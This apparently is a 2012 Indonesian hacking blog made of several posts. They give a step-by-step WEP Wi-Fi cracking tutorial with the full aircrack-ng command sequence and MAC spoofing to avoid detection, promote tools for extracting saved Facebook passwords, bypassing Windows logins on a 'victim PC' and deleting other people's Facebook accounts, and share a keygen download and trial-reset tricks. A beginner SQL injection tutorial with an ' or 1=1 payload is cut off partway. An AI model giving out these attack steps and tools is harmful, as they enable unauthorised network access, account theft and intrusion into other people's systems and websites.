Minggu, 11 November 2012

posting sebelum pergi pindah kota

Cara Hack Wifi atau Wireless Password

Halo way, saya hari ini akan menjelaskan kepada anda cara untuk memecahkan Wifi atau sandi nirkabel hanya dalam 10 sampai 15 menit. Hari ini saya akan menjelaskan Cara Hack atau Crack Wifi Password. Hari hack akan didasarkan pada retak password enkripsi WEP. Jadi orang mengencangkan ikat pinggang Anda untuk baru hack dan mari kita mulai hack wifi. Saya juga memasukkan video di bawah posting. Jadi orang membaca dan menonton ....

LANGKAH UNTUK HACK PASSWORD ATAU WIRELESS WIFI


1. Dapatkan CD Backtrack-Linux
. Backtrack Linux Live CD (Linux terbaik tersedia untuk hacker dengan lebih dari 2000 hacking tools built-in).
Download Backtrack Linux Live CD dari sini: KLIK DI SINI
atau KLIK DI SINI

2. SCAN UNTUK MENDAPATKAN KORBAN

Dapatkan korban serangan itu adalah password yang ingin Anda hack atau crack.
Sekarang Masukkan Backtrack Linux CD ke dalam drive CD Anda dan memulainya. Setelah itu klik mulai pada kotak hitam di sudut kiri bawah untuk memuat sebuah "Konsole". Sekarang Anda harus mulai kartu Wifi. Untuk melakukannya ketik:
airmon-ng

Anda akan melihat nama kartu nirkabel Anda. (saya adalah bernama "ath0") Dari sini anda keluar, ganti nama kartu anda dengan "ath0". Sekarang ketik:
airmon-ng stop ath0

kemudian ketik:

ifconfig wifi0 down


kemudian ketik:


macchanger --mac 00:11:22:33:44:55 wifi0


kemudian ketik:

airmon-ng start wifi0

langkah-langkah di atas telah menjelaskan unt memalsukan diri dari dilacak. Pada langkah di atas kita spoofing MAC address kita, ini akan membuat kita tidak dapat ditemukan.

sekarang ketik:

airodump-ng ath0

Semua langkah di atas dalam satu screen shot:



Sekarang Anda akan melihat daftar jaringan nirkabel di Konsole. Beberapa akan memiliki sinyal yang lebih baik dari yang lain dan selalu nya ide yang baik untuk memilih satu yang memiliki kekuatan sinyal yang terbaik selain itu akan memakan waktu yang sangat besar untuk crack atau hack password atau Anda mungkin tidak dapat retak sama sekali.
Setelah Anda melihat daftar jaringan, sekarang pilih jaringan yang ingin Anda hack. Untuk membekukan layar airodump TAHAN tombol CNTRL dan Tekan C.
Sekarang Anda akan melihat sesuatu seperti ini:


3. MEMILIH JARINGAN UNTUK HACKING

Sekarang menemukan jaringan yang ingin Anda hack dan PASTIKAN bahwa ia mengatakan enkripsi untuk jaringan yang WEP. Jika tertulis WPA atau variasi WPA kemudian berpindah ... Anda masih dapat crack WPA dengan mundur dan beberapa alat lainnya tetapi adalah permainan bola seluruh lain dan Anda perlu menguasai WEP pertama.


Setelah Anda memutuskan jaringan, mencatat nomor saluran dan BSSID. BSSID akan terlihat seperti ini -

00:23:69:bb:2d:of


Jumlah Channel akan berada di bawah sebuah heading yang mengatakan "CH".
Seperti ditunjukkan dalam gambar ini:


Sekarang di Konsole jenis jendela yang sama:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0


Sekarang di jendela yang sama jenis Konsole: Nama file dapat apa pun yang Anda inginkan. File ini adalah tempat di mana airodump akan menyimpan paket info yang Anda terima untuk kemudian retak. Anda bahkan tidak dimasukkan dalam ekstensi ... hanya memilih kata acak yang akan Anda ingat. Saya biasanya membuat saya "Ben" karena saya selalu bisa mengingatnya. Its hanya karena i love Ben10 .... hhahahahaha: D

Catatan: Jika Anda ingin retak lebih dari satu jaringan dalam sesi yang sama, Anda harus memiliki nama file yang berbeda untuk setiap satu atau itu tidak akan berhasil. Saya biasanya nama mereka sebagai ben1, ben2 dll

Setelah Anda mengetikkan perintah terakhir, layar airodump akan berubah dan mulai menunjukkan komputer Anda paket pertemuan. Anda juga akan melihat pos bertanda "IV" dengan nomor di bawahnya. Ini adalah singkatan untuk "Inisialisasi Vektor" tetapi secara umum semua ini berarti "paket dari info yang berisi karakter dari password." Setelah Anda mendapatkan minimal 5.000 IV ini, Anda dapat mencoba untuk memecahkan password. Aku sudah retak tepat beberapa di 5.000 dan yang lainnya telah mengambil alih 60.000. Ini tergantung pada berapa lama dan sulit mereka membuat password. Lebih sulit adalah paket password semakin Anda akan perlu untuk memecahkannya.

4. Cracking password WEP

Sekarang tinggalkan jendela ini Konsole dan berjalan dan membuka jendela Konsole 2.
Dalam tipe window:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

Ini akan mengirimkan beberapa perintah untuk router bahwa pada dasarnya itu adalah untuk mengaitkan komputer Anda meskipun Anda tidak resmi berhubungan dengan password. Jika perintah ini berhasil, Anda akan melihat sekitar 4 baris mencetak teks keluar dengan yang terakhir mengatakan sesuatu yang mirip dengan "Asosiasi :-) Sukses"
Jika ini terjadi, maka baik! Anda hampir ada.

Sekarang ketik:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0


Ini akan menghasilkan sekelompok teks dan kemudian Anda akan melihat baris mana komputer Anda adalah mengumpulkan segudang paket dan menunggu di ARP dan ACK. Jangan khawatir tentang apa artinya ini ... hanya tahu bahwa ini adalah tiket makan Anda. Sekarang Anda hanya duduk dan menunggu. Setelah komputer Anda akhirnya mengumpulkan sebuah permintaan ARP, ia akan mengirim kembali ke router dan mulai menghasilkan ratusan ARP dan ACK per detik. Kadang-kadang ini mulai terjadi dalam hitungan detik ... kadang-kadang Anda harus menunggu hingga beberapa menit. Hanya bersabar. Ketika akhirnya tidak terjadi, beralih kembali ke jendela pertama Konsole anda dan anda akan melihat nomor di bawah IV mulai meningkat pesat. Ini hebat! Ini berarti Anda hampir selesai! Bila jumlah ini mencapai SEDIKITNYA 5.000 maka Anda dapat mulai membobol password anda. Mungkin akan memakan waktu lebih dari ini, tetapi saya selalu memulai sandi saya cracking di 5.000 hanya jika mereka memiliki password yang benar-benar lemah.

Sekarang anda perlu membuka 3 dan jendela Konsole akhir. Hal ini akan berada di tempat kita sebenarnya crack password.
Sekarang ketik:

aircrack-ng -b (bssid) (filename)-01.cap


Ingat nama file yang dibuat sebelumnya? Tambang adalah "Ben". Jangan menempatkan spasi di antara itu dan-01.cap sini. Jenis sebagai Anda melihatnya. Jadi bagi saya, saya akan ketik wepkey-01.cap
Setelah Anda melakukan ini, Anda akan melihat api aircrack dan mulai crack password. biasanya Anda harus menunggu lebih seperti 10.000 hingga 20.000 IV sebelum akan retak. Jika hal ini terjadi, aircrack akan menguji apa yang Anda miliki sejauh ini dan kemudian akan mengatakan sesuatu seperti "tidak cukup IV Coba lagi di 10.000.."
JANGAN LAKUKAN APA PUN! Ini akan tetap berjalan ... itu hanya membiarkan Anda tahu bahwa itu ada di jeda sampai lebih IV berkumpul. Setelah Anda melewati tanda 10.000 maka secara otomatis akan menjalankan lagi dan mencoba untuk memecahkannya. Jika ini gagal maka akan mengatakan "tidak cukup IV Coba lagi di 15.000.." dan seterusnya sampai akhirnya mendapatkannya.

Jika Anda melakukan semuanya dengan benar sampai titik ini, sebelum terlalu lama Anda akan memiliki password! sekarang jika password tampak konyol, khawatir dont, itu akan tetap bekerja. beberapa password disimpan dalam format ASCII, dalam hal ini, aircrack akan menunjukkan kepada Anda apa karakter mereka ketik in untuk password mereka. Kadang-kadang, meskipun, password tersebut disimpan dalam format HEX dalam hal komputer akan menampilkan enkripsi HEX dari password. Tidak masalah dengan cara baik, karena Anda dapat mengetik di salah satu dan akan menghubungkan Anda ke jaringan.

Perhatikan, bahwa password akan selalu ditampilkan di aircrack dengan tanda titik setelah setiap 2 karakter. Jadi misalnya jika password adalah "rahasia", akan ditampilkan sebagai:

se:cr:et


Hal ini jelas akan menjadi format ASCII. Jika itu adalah HEX sandi terenkripsi itu adalah sesuatu seperti "0FKW9427VF" maka akan tetap ditampilkan sebagai:

0F:KW:94:27:VF



Hanya menghilangkan tanda titik dua dari password, boot kembali ke sistem operasi apa pun yang Anda gunakan, mencoba untuk terhubung ke jaringan dan ketik password tanpa titik dua dan presto! Anda berada di!

Ini mungkin tampak seperti banyak berurusan dengan jika Anda belum pernah melakukannya, tapi setelah mencoba beberapa berhasil, Anda akan menjadi sangat cepat dengan itu. Jika saya di dekat sebuah router WEP dienkripsi dengan sinyal yang baik, saya sering bisa memecahkan sandi hanya dalam beberapa menit.

Saya tidak bertanggung jawab atas apa yang Anda lakukan dengan informasi ini. Setiap kegiatan / berbahaya ilegal yang anda lakukan, jatuh sepenuhnya pada Anda karena ... teknis ... ini hanya bagi Anda untuk menguji keamanan jaringan Anda sendiri.



Cara Bypass / Hapus semua Survei Dari Website?

Good Morning All,Pagi ini saya akan mengajarkan anda cara untuk menghapus / memotong survei dari Beberapa Survei websites. memungkinkan Anda untuk dengan mudah menghapus survei dari situs-situs, yang bisa Anda akses ke konten "premium". Remover secara otomatis mendukung survei dari penyedia seperti CPALead, AdscendMedia, LeadBolt dan banyak lagi..

Ini adalah thread resmi dari Remover Survey. Kode ini menghilangkan survei, yang mencegah Anda dari situs-situs survei, tanpa Anda harus menyelesaikan survei online. Oleh karena itu, Anda tidak perlu membuang waktu dan uang Anda mengisi formulir sehingga orang lain akan dibayar untuk kerja keras Anda. Ia juga menghentikan Anda dari mengekspos informasi privasi lebih untuk perusahaan pemasaran dari yang pada Anda kenyamanan anda .

Remover ini bekerja tidak seperti proxy (yang sering reruntuhan kegunaan halaman dan fungsi) tetapi hanya dengan menghapus survei.

Para Remover Survei adalah dirancang untuk membantu melindungi privasi online Anda dan menghemat waktu dan uang, dengan memungkinkan Anda untuk mengakses area konten "premium" di situs Web, tanpa menyelesaikan survei. Bookmarklet ini menggunakan teknik-teknik canggih javascript untuk mengubah cara tata letak situs web konten mereka, sehingga memungkinkan Anda untuk melihat dengan benar, tanpa harus melakukan survei hanya untuk orang lain untuk mendapatkan keuntungan dari waktu Anda!

Jadi, mengapa website membuat Anda melakukan survei? Sederhananya, orang membuat uang dari Anda ketika Anda mengisi mereka: itu disebut BPA iklan. Di sinilah sebuah website dibayar ketika Anda melakukan suatu tindakan seperti mengisi survei.

Apakah semua survei internet online yang buruk itu? Tidak - Anda dapat menghasilkan uang dengan mengisi survei online: itu adalah salah satu cara simpliest untuk membuat online uang cepat! Pemasaran adalah bisnis besar: dengan belajar untuk menargetkan produk pada orang yang tepat, perusahaan mengurangi belanja iklan dan meningkatkan penjualan. Survei online karena itu dapat membayar tunai untuk pendapat Anda yang berharga. Hanya saja situs ini tidak percaya bahwa Anda harus dimanfaatkan untuk keuntungan orang lain.

Didukung Survei Penyedia:

Ini adalah daftar dari pihak ketiga didukung, perusahaan pemasaran online, yang merupakan penyedia utama meliputi konten, BPA survei. Mereka bukan situs individu, yang bekerja pada remover: situs di internet dapat menggunakan survei disediakan oleh perusahaan berikut. Furthmore, jika Anda menemukan sebuah situs yang menggunakan konten yang mencakup survei, Contoh Situs web yang ada surveinya , seperti dibawah ini:




cpalead.com
adultaccessnow.com
adscendmedia.com
oocee.com
perfecttracking.com
cpalock.com
dollarade.com
blackhatcodebreaker.com
instantdollarz.com
leadbolt.net
pointclicktrack.com
syndik8ed.com
adpath.mobi
advertisingvalue.info
bannerperformance.net
bannersurvey.biz
bannertrack.info
ldgateway.com
gatewaypass.biz
clicksurvey.mobi
impressionaffiliate.mobi
clickperformance.net
impressioncontent.info
impressionaffiliate.com
impressionvalue.mobi
impressionwidget.net
impressionperformance.biz
leadad.mobi
leadadvert.info
junglefriendtracker.info
offeradvertising.biz
optimizeadvert.biz
performancetrack.info
clicktracking.biz
promotionoffer.mobi
promotiontrack.mobi
surveyvalue.mobi
unlockr.com
surveywidget.biz
wegetpaid.net
trackadvertising.net
trackingoffer.info
trackingoffer.net
trackpath.biz
trackpromotion.net
gate-ru.com
advertisingpath.net
valueaffiliate.net
awesomevitamin.net
mgcash.com
stuckads.com
affiliatevalue.info
valuecontent.net
amazonaws.com
affiliategateways.co
widgetadvertising.biz
widgetbanner.mobi
personalclp.info
surveyvalue.net
widgetlead.net
adworkmedia.com
widgetvalue.net
widgetsurvey.biz
wfnetwork.com
auto-insurance-quotes-compare.com
cpalockup.com
stealthlockers.com
impressionpromotion.info
ikhouzotjesveelvanjou.com
tredirect.com
adgatemedia.com

Persyaratan:

> Anda harus mengaktifkan Javascript.
> Anda harus menggunakan browser yang didukung - semua browser utama termasuk Internet Explorer yang didukung
> Anda harus membaca syarat dan ketentuan sebelum menggunakan remover.

 

Download KeyScrambel Premium 2.8.2.0 | Keygen | Free


KeyScrambler mengenkripsi keystrokes Anda di kernel dan mendekripsi itu pada aplikasi tujuan, meninggalkan Keylogger dengan tombol terbaca untuk merekam. Untuk kantor pribadi Anda, keluarga, dan bisnis, KeyScrambler menambahkan lapisan pertahanan yang handal. Ia bekerja bahkan pada komputer keamanan dikompromikan. Hal ini kompatibel dengan program keamanan lainnya dan metode otentikasi seperti kartu token dan cerdas. Hal ini membutuhkan tidak ada upaya pada bagian Anda dan memungkinkan Anda melihat enkripsi hidup.
Untuk browsing web + kerja + bermain. KeyScrambler Pro melindungi semua masukan Anda di IE, Firefox, Opera, dan Flock, dan hampir 80 browser lain dan aplikasi: Browser Populer, Klien Email; IM / VoIP Klien; Manajer Sandi, Program Zip, Online Games, New! Teks Editor ...



Home Page : http://www.qfxsoftware.com

 DOWNLOAD FROM MEDIAFIRE


Enjoy ...


ini adalah lanjutan post dari http://tianboyand.blogspot.com/2011/05/all-password-recovery-tools.html

disini saya akan menjelaskan tutorialnya ..

langsung saja ke tkp ..

facebook Password decryptor adalah perangkat lunak GRATIS untuk segera memulihkan password account yang disimpan Facebook disimpan oleh web browser populer dan rasul. Sebagian besar aplikasi penyimpanan password Login untuk mencegah hassale dari masukan password setiap pengguna.

 

All Password Recovery Tools Part II ( Password Facebook Decryptor)




1. Features of FacebookPasswordDecryptor

Facebook Password Decryptor men-support recpvery dari password account yang tersimpan Facebook dari sebagian besar browser internet yang populer. Berikut adalah daftar lengkap aplikasi yang didukung.

Internet Explorer
Firefox
Google Chrome
Opera Browser
Apple Safari
Flock Browser
Paltalk Messenger
Miranda Messenger

2. Installing FacebookPasswordDecryptor

Meskipun FacebookPasswordDecryptor adalah tools yang portable, tapi tools ini diharuskan untuk menginstall dengan Installer sehingga Anda dapat menginstalnya secara lokal pada sistem anda untuk penggunaan reguler. Agan” dapat menggunakan Uninstaller untuk menghapus perangkat lunak dari sistem.




3. Using FacebookPasswordDecryptor

Using GUI Version

Jalankan Facebook Password Decryptor
Kemudian klik “Start Recovery” , maka semua password login facebook dari berbagai aplikasi yang digunakan akan ter- recover dengan sendirinya (screen 1).
Default password tidak ditampilkan untuk alasan keamanan karena data sensitif. Namun anda dapat mengklik tombol on’Show Password ‘di bagian bawah untuk melihat password tersebut.
Setalah itu anda dapat menyimpan semua recovery password dalam kedalam format txt maupun Html dengan memilih “export to text” atau “export to Html”.

FacebookPasswordDecryptor

FacebookPasswordDecryptor adalah perangkat lunak GRATIS untuk segera memulihkan password account yang disimpan Facebook disimpan oleh web browser populer dan rasul. Sebagian besar aplikasi penyimpanan password Login untuk mencegah hassale dari masukan password setiap pengguna.

Features of FacebookPasswordDecryptor

Facebook Password Decryptor men-support recpvery dari password account yang tersimpan Facebook dari sebagian besar browser internet yang populer. Berikut adalah daftar lengkap aplikasi yang didukung.

Internet Explorer
Firefox
Google Chrome
Opera Browser
Apple Safari
Flock Browser
Paltalk Messenger
Miranda Messenger

Installing FacebookPasswordDecryptor

Meskipun FacebookPasswordDecryptor adalah tools yang portable, tapi tools ini diharuskan untuk menginstall dengan Installer sehingga Anda dapat menginstalnya secara lokal pada sistem anda untuk penggunaan reguler. Agan” dapat menggunakan Uninstaller untuk menghapus perangkat lunak dari sistem.


Installer

Using FacebookPasswordDecryptor

Using GUI Version

Jalankan Facebook Password Decryptor
Kemudian klik “Start Recovery” , maka semua password login facebook dari berbagai aplikasi yang digunakan akan ter- recover dengan sendirinya (screen 1).
Default password tidak ditampilkan untuk alasan keamanan karena data sensitif. Namun anda dapat mengklik tombol on’Show Password ‘di bagian bawah untuk melihat password tersebut.
Setalah itu anda dapat menyimpan semua recovery password dalam kedalam format txt maupun Html dengan memilih “export to text” atau “export to Html”.



Using Command-line Version

FacebookPasswordDecryptor.exe “

Contoh nya:

//Writes recovered password to text file in current directory
FacebookPasswordDecryptor.exe output.txt

//Writes recovered password to HTML file in current directory
FacebookPasswordDecryptor.exe output.html

//Writes recovered password to TEXT file
FacebookPasswordDecryptor.exe “c:\my test\passlist”

Secara otomatis mendeteksi mode (teks atau html) dengan menggunakan ekstensi dari file yang ditentukan (txt atau html). Default (atau jika tidak ada ekstensi yang ditentukan) menggunakan mode TEXT (screen 2).

Screenshot hasil recover password facebook oleh Facebook Password Decryptor:



Screenshot perintah dalam command line:



List export data dalam bentuk Html menggunakan Facebook Password Decrypter



Download Softwarenya here (free)

Enjoyy ..




Akses PC Manapun Tanpa Mengetahui Password

Hi Agan - agan Sekalian, Seperti yang Anda tahu, semakin dalam pc seseorang yang ingin kita akses fisik bukanlah tugas yang mudah .kebanyakan mereka akan membuat kata sandi .jadi ini saya ada alat sederhana yang akan membantu Anda untuk mendapatkan access login .Itu adalah KON-BOOT. Daripada cracking password Windows, KON-BOOT bypasses AKAN memungkinkan Anda ke komputer tanpa mengetik PASSWORD masuk Kemudian, ketika Anda me-restart, semuanya kembali normal, yaitu, segala sesuatu yang Anda lakukan tidak berubah ketika Anda berada di dalam.

No need of any pro knowledge require.Just download this tool.Burn to a disk or setup live usb.Plug it into to victim pc.Start the computer.

You'll see the screen of Kon boot and it'll restart.Then there'll be no password for logging in.After doing your works,restart again and there'll be password as before and no one know..that you were inside.It is that simple to use.

Download here

enjoyy ..







SQL Injection Hack tool untuk hacking situs web dan database

Safe3SI adalah salah satu alat uji penetrasi penggunaan yang paling kuat dan mudah yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database. Muncul dengan mesin deteksi kick-ass, fitur banyak ceruk untuk tester penetrasi tertinggi dan berbagai switch yang berlangsung dari database sidik jari, lebih mengambil data dari database, untuk mengakses sistem file yang mendasari dan mengeksekusi perintah pada sistem operasi melalui out-of-band koneksi.


Fitur


* Dukungan penuh untuk http, https website.
* Dukungan penuh untuk Basic, Digest, NTLM otentikasi http.
* Dukungan penuh untuk GET, Post, Cookie injeksi sql.
* Dukungan penuh untuk MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase dan sistem manajemen database SAP MaxDB.
* Dukungan penuh untuk empat injeksi teknik SQL: buta, kesalahan-based, query UNION dan tebak gaya.
* Powerfull AI mesin untuk tipe injeksi recognite otomatis, tipe database, sql injeksi cara terbaik.
* Dukungan untuk menghitung database, tabel, kolom dan data.
* Dukungan untuk membaca, daftar dan menulis file apa saja dari server database file system yang mendasari ketika software database MySQL atau Microsoft SQL Server.
* Dukungan untuk mengeksekusi perintah sewenang-wenang dan mengambil output standar mereka pada database server sistem operasi yang mendasari ketika software database Oracle atau Microsoft SQL Server.
* Dukungan untuk ip query domain, web menebak jalan, md5 retak dll
* Dukungan untuk injeksi sql scan.

Download

Enjoy ..
Kasih Comment ya ... 


Facebook Account Deleter (100% Working)

Hi, Agan-Agan Sekalian, karena banyak pengguna meminta saya untuk memanfaatkan untuk menghapus account facebook seseorang jadi ini adalah salah satu alat yang terbaik yang saya temukan untuk alasan itu. setiap orang bawa hari ini untuk menghapus account orang lain. Ini adalah virus 100% gratis.

Requirements:

1) .Net Framework 4 Client Profile (x86 and x64) / If you dont have it, download it from here.

2) Microsoft Visual Basic Power Packs 3.0 / If you dont have it, download it from here.

3) Finally, download this Here


Download:

Click here to download (Direct Link)



Pass:-  Ioare@_w
Enjoy ..

Top 5 Alat Hack

Halo teman, saya hari ini akan berbagi dengan Anda atas 5 alat hack hacker untuk Selidiki atau Foresnic sistem komputer atau PC. Apakah Anda pernah merasa bahwa sistem anda terganggu atau berbagi? Apakah Anda pikir sistem anda memiliki software yang tidak biasa atau paket yang diinstal di sana yang mengirim data rahasia atau rahasia pribadi untuk Hackers lain? Selalu ketakutan untuk menguji setiap hack alat yang mengandung virus atau malware atau tidak? Ingin untuk menyelidiki jaringan Anda yang aplikasi yang sedang mengirim data ke siapa atau mana?
Jika ada pertanyaan cocok Anda kemudian posting ini adalah untuk Anda. Tetapi jika saya berbicara dengan hati alat-alat ini wajib bagi setiap pengguna noraml dan hacker juga untuk menyelidiki sistem mereka dari boot untuk menutup. Hari ini saya membuat Anda hacker etis nyata seperti saya hari ini akan mengajarkan anda bagaimana untuk menyelidiki sistem anda. Dan bagaimana untuk menyingkirkan antivirus noobish yang hanya ada pada PC Anda hanya mengkonsumsi sumber daya sistem Anda.

Daftar top 5 hack alat bagi para hacker untuk Inverstigate atau Forensik sistem komputer atau PC:
1. Live View
2. Start up Daftar
3. File Open Lihat
4. Wireshark
5. Helix 3

Kerja bertahap tools diatas:


1. Live View
Live View adalah sebuah utilitas open source yang membuat mesin virtual sistem yang ada. Live View menciptakan disk virtual keluar dari sistem yang memungkinkan Anda untuk kemudian dengan aman menyelidiki salinan sistem tanpa campur dengan apa-apa diinstal. Jadi Anda dapat dengan mudah menyelidiki sistem anda hampir tanpa mempengaruhi sistem yang asli.
Sekarang restart PC Anda untuk penyelidikan lebih lanjut dan alat untuk digunakan.
Anda dapat mendownload Live View gratis di sini (Klik disini untuk download).

2. Start up Daftar
Sekarang Anda memiliki salinan virtual dari sistem anda dan sekarang mengapa Anda menunggu mari kita mulai menyelidiki PC. Jadi download Start Up List (klik di sini untuk men-download daftar startup). Ini adalah cara yang bagus untuk memulai investigasi sistem dan menentukan hal-hal yang mungkin berpotensi telah memakai sistem untuk me-restart setiap kali sistem tidak. Ini akan memberi Anda daftar semua program yang menggunakan sistem pada waktu boot. Cara yang bagus untuk menemukan keyloggers dan lainnya alat montitoring remote karena mereka selalu ditambahkan untuk memulai.
Sekarang mengapa saya mengatakan alat ini karena Anda langsung bisa melakukannya dengan menggunakan perintah msconfig. Jawaban yang sederhana seperti pertanyaan, msconfig hanya menampilkan daftar program yang melekat untuk memulai menggunakan kunci registri. Biasanya apa yang terjadi virus melampirkan diri untuk beberapa layanan jendela yang ada sehingga akan menjadi sulit untuk mengidentifikasi contoh-contoh nya. Start up menampilkan daftar semua program tanah kembali juga.

3. File Open Lihat
Langkah berikutnya dalam menyelidiki komputer Anda adalah untuk menemukan atau menentukan file lain, lain dari biasanya yang terbuka. Di Linux kita bisa langsung melakukannya dengan menggunakan perintah ISOF di terminal tetapi tidak ada perintah yang serupa di windows. Ahhah sekarang apa yang akan Anda lakukan untuk menyelidiki ini .. Jangan khawatir OpenFilesView ada (klik di sini untuk men-download openfileview). Openfilesview adalah sebuah aplikasi Windows yang berisi daftar semua file dan proses yang aktif saat ini - baik lokal dan jaringan berbasis - pada sistem. Sehingga Anda dapat dengan mudah mengidentifikasi mana file yang tidak biasa dibuka atau proses yang tidak biasa sedang berjalan. Sekarang bagaimana membantu, semua keyloggers atau alat administrasi remote selalu memelihara sebuah file sementara yang mereka tulis mereka log atau detail lainnya. Muahhhhhh ... Sekarang tidak ada yang tersembunyi dari Anda. Anda dapat melihat masing-masing dan segala sesuatu dan mengetahui dengan mudah bahwa yang noob virus atau keylogger berjalan pada sistem Anda.

4. Wireshark
Tambang keluar alat favorit dari 5 alat. Sekarang anda telah meneliti sistem anda dengan menggunakan alat-alat di atas sana, waktu untuk menyelidiki lalu lintas jaringan Anda. Beberapa kali hal itu terjadi, ketika anda menginstal beberapa perangkat lunak Anda meragukan bahwa itu adalah mengirimkan data pribadi Anda atau informasi kepada orang lain. Wireshark adalah alat yang memonitor paket jaringan dan analisis mereka di mana datanya pengiriman. Sekarang bagaimana trojan sangat membantu anda, yang Kebanyakan dan keyloggers mengirim log menggunakan jaringan dan upload ke FTP atau mengirim mereka ke beberapa alamat email. Menggunakan wireshark Anda dapat memantau apa yang mereka mengirim dan bahkan username dan password FTP dan account email yang menjadi pengiriman. Ini adalah faktor yang paling menjanjikan yang membuat untuk mencintai wireshark lebih. Jadi mengapa menunggu download wireshark secara gratis: (Klik di sini untuk men-download Wireshark).

5. Helix 3
Sekarang Anda semua akan berpikir kita sudah melakukan segalanya, investigasi yang dilakukan ...: D tapi saya Merusak Pikiran. Jadi beberapa hal lagi yang mencolok pikiran saya. Apa yang saya lebih dapat menyelidiki di PC. Setiap tebakan ...
Sial .. saya lupa saya sedang mengajar anda ..
Sekarang bagaimana anda menentukan apa yang virus noob telah berubah di sistem anda, file mana mereka memiliki tanda tangan mereka diedit atau melekat yang mana dari program dan paling penting apa yang mereka telah diedit atau ditambahkan. Hal ini dapat Anda lakukan dengan bantuan Helix 3. Helix 3, versi baru update dari alat forensik live Linux, dapat digunakan untuk memeriksa disk aman untuk melihat apa yang telah akhirnya berubah. Jadi orang sekarang bagaimana berkelas Anda pikir Anda telah menjadi. Tapi maaf untuk memberitahu Anda bahwa bagian pertama dari kehidupan hacker dan guranttee guys i 99,99% tidak tahu alat-alat ini. Ahhh ... Jika mereka tahu tentang alat ini maka mereka pasti tidak tahu cara menggunakan mereka dan lebih penting jika mereka tahu yang juga mungkin mereka tidak pernah menggunakan mereka karena mereka MALAS cukup dan meninggalkan semuanya di antivirus noob.
(Klik di sini untuk men-download helix3) suatu Its 30 orang hari percobaan versi, seperti versi lisensi untuk satu sistem saja dan saya tidak dapat berbagi saya: D. Tetapi saya dapat memberitahu Anda beberapa trik luar biasa untuk menggunakannya sebanyak yang Anda inginkan. Untuk men-download versi evalation lagi dan lagi hanya mendaftar dengan ID email baru dan menghapus versi sebelumnya menggunakan Manajer WinXP yang menghilangkan kunci registri juga.

Saya harap Anda menyukai artikel ini ... Tidak Anda harus menyukai artikel ini jika Anda hacker atau ingin menjadi hacker dan posting ini layak mendapatkan terima kasih. Jika Anda benar-benar suka atau mendapatkan manfaat maka silakan komentar. Anda juga dapat mengirim komentar indah anda jika anda memiliki keraguan. Dalam artikel saya selanjutnya saya akan menjelaskan alat ini secara rinci yang bagaimana menggunakan alat-alat ini secara efektif. Dan satu hal lagi, satu-satunya penyelidikan, dalam artikel mendatang saya akan mengajarkan anda bagaimana untuk memperbaiki dan menghapus tanda tangan virus dari file bahkan tanpa antivirus.

Enjoy..


SQL Injection tutorial untuk hack situs | Hacking website

SQL Injection tutorial untuk hack situs | Hacking website

Halo teman, seperti yang Anda semua tahu di kelas hacking sebelumnya kita telah membahas tentang metode Suntikan SQL hacking website. Beberapa pengguna website saya melaporkan bahwa pasal-pasal yang sedikit agak sulit dipahami bagi pengguna baru yang ingin belajar hacking. Demi pengguna baru yang ingin belajar hacking website dan injeksi SQL, saya menulis artikel ini pada tingkatan dasar yang user yang bahkan tidak memiliki pengetahuan sebelumnya dari SQL dapat mulai website SQL suntik. Artikel ini juga bermanfaat bagi para hacker juga karena akan menyegarkan konsep-konsep mereka bahwa apa yang benar-benar kita harus lakukan dan melihat ke dalam URL website jika kita ingin hack website atau database dengan menggunakan SQL injection. Jadi Guys baca di SQL injection sangat mendasar tutorial ini ...

Apa itu SQL Injection?
Pada dasarnya SQL Suntikan atau hanya disebut Structured Query Language Injection merupakan teknik yang mengeksploitasi lubang loop dalam lapisan aplikasi database. Hal ini terjadi ketika pengguna keliru atau sengaja (hacker) melarikan diri memasuki karakter khusus ke dalam bentuk otentikasi username atau password di URL dari situs web. Its dasarnya lubang pengkodean loop standar. Kebanyakan pemilik website tidak memiliki pengetahuan yang tepat dari standar pengkodean aman dan bahwa hasil ke dalam situs web rentan. Untuk pemahaman yang lebih baik, jika Anda membuka sebuah situs web dan pergi ke-Nya Sign in atau log in halaman. Sesuatu Sekarang di lapangan nama pengguna yang Anda masukkan katakan Lokesh dan di kotak password yang Anda melewati beberapa karakter melarikan diri seperti ', ", 1 = 1, dll .. Sekarang jika pemilik situs tidak ditangani karakter string null atau melarikan diri karakter maka user pasti akan mendapatkan sesuatu yang lain bahwa pemilik tidak pernah ingin pengguna mereka untuk melihat .. Hal ini pada dasarnya disebut Blind SQL.

Persyaratan untuk SQL Injection:
1. Anda perlu web browser untuk membuka URL dan kode sumber.
2. Butuh editor yang baik seperti Notepad + + untuk melihat kode sumber dalam format berwarna sehingga Anda dapat dengan mudah membedakan antara hal-hal.
3. Dan pengetahuan yang sangat dasar dari beberapa query SQL seperti SELECT, INSERT, UPDATE, DELETE dll.

What you should look into website to detect is it vulnerable to SQL injection attack or not?

Pertama-tama Anda bisa hack situs-situs yang menggunakan hacks SQL injection yang memungkinkan masukan dari beberapa bidang yang dapat memberikan masukan untuk website seperti halaman login, halaman pencarian, umpan balik halaman dll Saat ini, halaman HTML menggunakan perintah POST untuk mengirim parameter ke ASP / Halaman aspx. Oleh karena itu, Anda mungkin tidak melihat parameter dalam URL. Namun, Anda dapat memeriksa kode sumber HTML, dan mencari tag "FORM" dalam kode HTML. Anda mungkin menemukan sesuatu seperti ini dalam beberapa kode HTML:

< F O R M action=login. aspx method=post>
< i n p u t type=hidden name=user v a l u e=xyz>
< / F O R M>

Semuanya antara
dan parameter (menghapus spasi dalam kata-kata) berisi informasi yang penting dan dapat membantu kita untuk menentukan hal-hal dengan cara yang lebih terperinci.

Ada metode alternatif untuk mencari situs yang rentan, situs-situs yang memiliki ekstensi ASP, aspx, JSP, CGI atau PHP mencoba untuk mencari URL di mana parameter yang dilewatkan. Contoh ditunjukkan berikut ini:

http://example.com/login.asp?id=10

Sekarang bagaimana untuk mendeteksi bahwa URL ini rentan atau tidak:
Mulailah dengan trik kutip tunggal, mengambil parameter sampel sebagai hi'or1 = 1 --. Sekarang di id URL di atas adalah parameter dan 10 nilainya. Jadi ketika kami melewati hi'or1 = 1 - sebagai parameter URL akan terlihat seperti ini:

http://example.com/login.asp?id=hi 'atau 1 = 1 -

